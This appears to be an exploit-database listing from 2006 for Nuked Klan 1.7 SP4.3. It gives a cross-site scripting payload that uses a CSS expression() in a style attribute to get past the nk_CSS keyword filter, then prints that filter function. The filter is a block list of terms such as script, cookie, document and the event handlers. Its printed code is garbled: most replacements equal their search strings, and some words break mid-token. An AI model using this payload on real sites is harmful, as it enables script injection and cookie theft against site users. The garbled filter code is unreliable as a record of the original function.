Nuked Klan 1.7 SP4.3 : Function Anti-XSS Bypassed
CVE
Category
Price
Severity
N/A
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
N/A
High
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2006-09-05
CPE PURL
cpe:cpe:/a:nuked-klan-klan:-:-
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006090006 // *- BEGIN -*
// By Blwood
// http://blwood.net <http://blwood.net/>
We can bypassed the function anti-xss called nk_CSS ( nuked.php) using
like this :
<b id="blwood" style="width:expression(alert(' http://www.blwood.net'))
<http://www.blwood.net%27%29%29/>"></b>
Here is the function :
function nk_CSS($str)
{
if ($str != "")
{
$str = eregi_replace("content-disposition:","conten
;t-dispositio
n:",$str);
$str = eregi_replace("content-type:","content
-type:",$str);
$str = eregi_replace("content-transfer-encoding:","conte
;nt-transfer-&#
101;ncoding:",$str);
$str = eregi_replace("include","include",$str
);
$str = eregi_replace("<?","<?",$str);
$str = eregi_replace("<?php","<?php",$str);
$str = eregi_replace("?>","?>",$str);
$str = eregi_replace("script","script",$str);
$str = eregi_replace("eval","eval",$str);
$str = eregi_replace("javascript","javascri
;pt",$str);
$str = eregi_replace("embed","embed",$str);
$str = eregi_replace("iframe","iframe",$str);
$str = eregi_replace("refresh", "refresh", $str);
$str = eregi_replace("onload", "onload", $str);
$str = eregi_replace("onstart", "onstart", $str);
$str = eregi_replace("onerror", "onerror", $str);
$str = eregi_replace("onabort", "onabort", $str);
$str = eregi_replace("onblur", "onblur", $str);
$str = eregi_replace("onchange", "onchange", $str);
$str = eregi_replace("onclick", "onclick", $str);
$str = eregi_replace("ondblclick", "ondblclick", $str);
$str = eregi_replace("onfocus", "onfocus", $str);
$str = eregi_replace("onkeydown", "onkeydown", $str);
$str = eregi_replace("onkeypress", "onkeypress", $str);
$str = eregi_replace("onkeyup", "onkeyup", $str);
$str = eregi_replace("onmousedown", "onmousedown", $str);
$str = eregi_replace("onmousemove", "onmousemove", $str);
$str = eregi_replace("onmouseover", "onmouseover", $str);
$str = eregi_replace("onmouseout", "onmouseout", $str);
$str = eregi_replace("onmouseup", "onmouseup", $str);
$str = eregi_replace("onreset", "onreset", $str);
$str = eregi_replace("onselect", "onselect", $str);
$str = eregi_replace("onsubmit", "onsubmit", $str);
$str = eregi_replace("onunload", "onunload", $str);
$str = eregi_replace("document", "document", $str);
$str = eregi_replace("cookie", "cookie", $str);
$str = eregi_replace("vbscript", "vbscript", $str);
$str = eregi_replace("location", "location", $str);
$str = eregi_replace("object", "object", $str);
$str = eregi_replace("vbs", "vbs", $str);
$str = eregi_replace("href", "href", $str);
$str = eregi_replace("src", "src", $str);
}
return($str);
}
// *- END -*
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum